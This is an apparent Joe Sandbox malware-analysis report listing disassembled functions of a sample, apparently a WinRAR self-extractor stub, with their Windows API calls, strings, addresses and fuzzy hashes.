Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4d3d5afc141a1f4e4bc5ed827746a8ffd2474261e6fe2b85f799759b3e36a164
Instruction ID: 8b537c28fae6147a6e144b6a78479f91d8633b52ce8fc9f2dbea9779abc63b85
Opcode Fuzzy Hash: 4d3d5afc141a1f4e4bc5ed827746a8ffd2474261e6fe2b85f799759b3e36a164
Instruction Fuzzy Hash: B0319A32600205DFEB20BABCD945B5AB7E9FF00310F54846AF448D7696DF31AC81CB65

Function 0087CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0087CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0087CD7D

Part of subcall function 008717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0086BB05,00000000,.exe,?,?,00000800,?,?,008785DF,?), ref: 008717C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0087CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0087CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0087CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0087CDED
DeleteObject.GDI32(00000000), ref: 0087CDF4
GetWindow.USER32(00000000,00000002), ref: 0087CDFD

Strings

STATIC, xrefs: 0087CD83

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: ee185af170127163f00f293a8fee3fe94e66c50f48e510d07f08ef6051211f47
Instruction ID: dedc375bc1c2a438110c0bfe667f4864a2d5fbdf6cb891a164c1d3dd19339833
Opcode Fuzzy Hash: ee185af170127163f00f293a8fee3fe94e66c50f48e510d07f08ef6051211f47
Instruction Fuzzy Hash: DB113633140710BBE630AB64DC0AFAF3A6CFF45740F00C026FA5AE20D6CA74C91686A1

Function 00888EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00888EC5

Part of subcall function 008884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958), ref: 008884F4
Part of subcall function 008884DE: GetLastError.KERNEL32(00893958,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958,00893958), ref: 00888506

_free.LIBCMT ref: 00888ED1
_free.LIBCMT ref: 00888EDC
_free.LIBCMT ref: 00888EE7
_free.LIBCMT ref: 00888EF2
_free.LIBCMT ref: 00888EFD
_free.LIBCMT ref: 00888F08
_free.LIBCMT ref: 00888F13
_free.LIBCMT ref: 00888F1E
_free.LIBCMT ref: 00888F2C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: faa9f88b912ecef6d6cd2f1d2462bd47d431f541ac608126b038718d718a7a78
Instruction ID: d006b64b82c31ce69f935104e1d2f9f1aa3a47cd5db4c3d498169faf9a1e7416
Opcode Fuzzy Hash: faa9f88b912ecef6d6cd2f1d2462bd47d431f541ac608126b038718d718a7a78
Instruction Fuzzy Hash: 7711727651010DEFCB11FF98C942CDA3BA5FF04350B9181E5BA088B666DA32EE51DF86

Function 00862162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

xc%u, xrefs: 008626D7
x%u, xrefs: 0086267A
;%u, xrefs: 00862497

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: a68e367e59f026c5bd6d634e8bc6e2c605d6d863eafe12808e24dd3d95cf0a08
Instruction ID: f4163ce7f5b7de3554974728d89e81f218c696b563f09502864deba3fb3c30df
Opcode Fuzzy Hash: a68e367e59f026c5bd6d634e8bc6e2c605d6d863eafe12808e24dd3d95cf0a08
Instruction Fuzzy Hash: A5F117716047805BDB25EE28C895BFE7795FF94300F0A45ADF886CB283DB249944C7A3

Function 0087ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

EndDialog.USER32(?,00000001), ref: 0087AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0087AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0087AD60
SetWindowTextW.USER32(?,?), ref: 0087AD71
GetDlgItem.USER32(?,00000065), ref: 0087AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0087AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0087ADA4

Strings

LICENSEDLG, xrefs: 0087ACE4

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 97d962cf0649c9c58e172998066e795d939fe2fdbcb8a57878d3f09d35a4d34a
Instruction ID: 393988cd4d5fe2c8d02813f7602eb4426b414b1cfc7dda80b2bef3a24666f82c
Opcode Fuzzy Hash: 97d962cf0649c9c58e172998066e795d939fe2fdbcb8a57878d3f09d35a4d34a
Instruction Fuzzy Hash: F221B432244204BBE2255B65ED49E7F3F7CFB8AB46F054015F609D24E4DB659901D633

Function 00869443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00869448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0086946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0086948A

Part of subcall function 008717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0086BB05,00000000,.exe,?,?,00000800,?,?,008785DF,?), ref: 008717C2

_swprintf.LIBCMT ref: 00869526

Part of subcall function 0086400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0086401D

MoveFileW.KERNEL32(?,?), ref: 00869595
MoveFileW.KERNEL32(?,?), ref: 008695D5

Strings

rtmp%d, xrefs: 0086950F

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: a8aae91148f35b39ae1afa448ca82d5a6bb1d4028164397092c08ebf38ee280c
Instruction ID: 9116793d81e21962e079b33266ab14daf0e11f67505582900cdde3307f7c6cf4
Opcode Fuzzy Hash: a8aae91148f35b39ae1afa448ca82d5a6bb1d4028164397092c08ebf38ee280c
Instruction Fuzzy Hash: AD414171900258A6CF20EBA8CD85ADE777CFF25384F0544E5F589E3082EB748B89CB65

Function 00878E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00878F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00878F59
CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00878F80

Strings

</html>, xrefs: 00878F0A
utf-8"></head>, xrefs: 00878EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00878EB2
<html>, xrefs: 00878EA7, 00878EE0

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Global$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4094277203-4209811716
Opcode ID: c02978465a7e165af378c28a9372e782df1fe90142bf2d65c11f61fe7ef7ef12
Instruction ID: aca5f1b8cdda4679635440b7362b07e9693844697047c21f872305c4959d0feb
Opcode Fuzzy Hash: c02978465a7e165af378c28a9372e782df1fe90142bf2d65c11f61fe7ef7ef12
Instruction Fuzzy Hash: 7D316A32548301BBDB21BB689C4AF6F7768FF41720F14801AF815D62C1EF64DA0983A6

Function 00870A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00870A9D

Part of subcall function 0086ACF5: GetVersionExW.KERNEL32(?), ref: 0086AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00870AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00870AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00870AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00870AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00870B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00870B3D
__aullrem.LIBCMT ref: 00870BCB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 8ef5ac74ec4bde3949888b3f594b63575bc76bf641cfa961f43a53bc83266992
Instruction ID: 228506a70f7b38224ea9a7bf7308fd5a2cbea6a6cf153da4dcaa0118204cbac2
Opcode Fuzzy Hash: 8ef5ac74ec4bde3949888b3f594b63575bc76bf641cfa961f43a53bc83266992
Instruction Fuzzy Hash: EB4108B14083069FC714DF65C88496BFBE8FB88718F048A2EF596D2650E735E649CB52

Function 0088EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0088F5A2,?,00000000,?,00000000,00000000), ref: 0088EE6F
__fassign.LIBCMT ref: 0088EEEA
__fassign.LIBCMT ref: 0088EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0088EF2B
WriteFile.KERNEL32(?,?,00000000,0088F5A2,00000000,?,?,?,?,?,?,?,?,?,0088F5A2,?), ref: 0088EF4A
WriteFile.KERNEL32(?,?,00000001,0088F5A2,00000000,?,?,?,?,?,?,?,?,?,0088F5A2,?), ref: 0088EF83

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 563618e5888f40bd24f688c814913b7f92089da48ec23d15c8fe2b23e4f399d7
Instruction ID: 04fa7756cfcc0c81349daaaeebf8e9e048bd781804bdef040e0e3fbb54fe256e
Opcode Fuzzy Hash: 563618e5888f40bd24f688c814913b7f92089da48ec23d15c8fe2b23e4f399d7
Instruction Fuzzy Hash: C051D671A002499FDB10DFA8DC85AEEBBF9FF09310F14415AF555E7291EB309940CB61

Function 0087C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0087C54A
_swprintf.LIBCMT ref: 0087C57E

Part of subcall function 0086400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0086401D

SetDlgItemTextW.USER32(?,00000066,008A946A), ref: 0087C59E
_wcschr.LIBVCRUNTIME ref: 0087C5D1
EndDialog.USER32(?,00000001), ref: 0087C6B2

Strings

%s%s%u, xrefs: 0087C573

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: a5e56f93895f17af63b98b7e8502a86abe622dfacc9e6b90058af43820b367de
Instruction ID: 0677f1d850b8a31699d3adb27f1a77d4ca99f754683f71ca596d03ac2cbec604
Opcode Fuzzy Hash: a5e56f93895f17af63b98b7e8502a86abe622dfacc9e6b90058af43820b367de
Instruction Fuzzy Hash: 3941C371900618AADB26DBA4DC85EDA7BBDFB09705F0080AAE50DE7061E771DBC4CB61

Function 00879635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0087964E
GetWindowRect.USER32(?,00000000), ref: 00879693
ShowWindow.USER32(?,00000005,00000000), ref: 0087972A
SetWindowTextW.USER32(?,00000000), ref: 00879732
ShowWindow.USER32(00000000,00000005), ref: 00879748

Strings

RarHtmlClassName, xrefs: 008796F4

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 9b00ff415806ea6a7eeee38d0dcb52ed76221ad6376fd48ab33fac3f1920b17f
Instruction ID: 7fa0c2d675e730f95fdc026843379e2181bbd40d80267e707dd9579b9660682f
Opcode Fuzzy Hash: 9b00ff415806ea6a7eeee38d0dcb52ed76221ad6376fd48ab33fac3f1920b17f
Instruction Fuzzy Hash: 6231A031004204EFCB159F64DC48F6B7BB8FF48751F08855AFA89DA2A6DB34E905CB61

Function 0088BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0088BF79: _free.LIBCMT ref: 0088BFA2

_free.LIBCMT ref: 0088C003

Part of subcall function 008884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958), ref: 008884F4
Part of subcall function 008884DE: GetLastError.KERNEL32(00893958,?,0088BFA7,00893958,00000000,00893958,00000000,?,0088BFCE,00893958,00000007,00893958,?,0088C3CB,00893958,00893958), ref: 00888506

_free.LIBCMT ref: 0088C00E
_free.LIBCMT ref: 0088C019
_free.LIBCMT ref: 0088C06D
_free.LIBCMT ref: 0088C078
_free.LIBCMT ref: 0088C083
_free.LIBCMT ref: 0088C08E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 37b3bcae87c6d7518018da140d474de969d7b8200fd1f5a21a24bbe619c02d78
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 6811EA72940B48FAD620BBB4CC06FCBB799FF44700F808855B299E6452DF65A9088B96

Function 008820CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008820C1,0087FB12), ref: 008820D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008820E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008820FF
SetLastError.KERNEL32(00000000,?,008820C1,0087FB12), ref: 00882151

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2fcfb784aae510b52c75fad0e3f15756aaee7e8d510c83a955ad52d94274a636
Instruction ID: 9b7e2cc28d97b415f947930b0da5618be4f4ecbd05b7694a34e7b19a31d161f7
Opcode Fuzzy Hash: 2fcfb784aae510b52c75fad0e3f15756aaee7e8d510c83a955ad52d94274a636
Instruction Fuzzy Hash: D801DF36249712EEA6653BB9BC8952A3A88FB31B74B35062BF210D51E1FE129C01D344

Function 0087DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 0087DCC9
ReleaseSRWLockExclusive, xrefs: 0087DCD9
KERNEL32.DLL, xrefs: 0087DCB4

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: e4a3c09c719b00310c9ba2e494fc64e520b47222959fe7f4d2b2e6d47ecd9b69
Instruction ID: f007f7cf5833ca428160f3fc579686856a6f28d7506c146b8941c70160eda145
Opcode Fuzzy Hash: e4a3c09c719b00310c9ba2e494fc64e520b47222959fe7f4d2b2e6d47ecd9b69
Instruction Fuzzy Hash: 360128716417229B4F726FB45C816A627F4FF81356324913EE619D3304EAA2C881DBA0

Function 00870CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00870D0D

Part of subcall function 0086ACF5: GetVersionExW.KERNEL32(?), ref: 0086AD1A

LocalFileTimeToFileTime.KERNEL32(?,00870CB8), ref: 00870D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00870D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00870D56
SystemTimeToFileTime.KERNEL32(?,00870CB8), ref: 00870D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00870D72

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 36f56a6e2fe838c071d997f50fd2ddf36ce1271d0e4b3d9bccca181f7fc20f8f
Instruction ID: 527851d8f4989a66f86f1e336dafc91fd772d3c70d427b015cac174f4be3b8eb
Opcode Fuzzy Hash: 36f56a6e2fe838c071d997f50fd2ddf36ce1271d0e4b3d9bccca181f7fc20f8f
Instruction Fuzzy Hash: C331C87A900209EBCB10EFE5D8859EFBBB8FF58700B04456AE955E3214E7309A45CB65

Function 008791B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008791D4
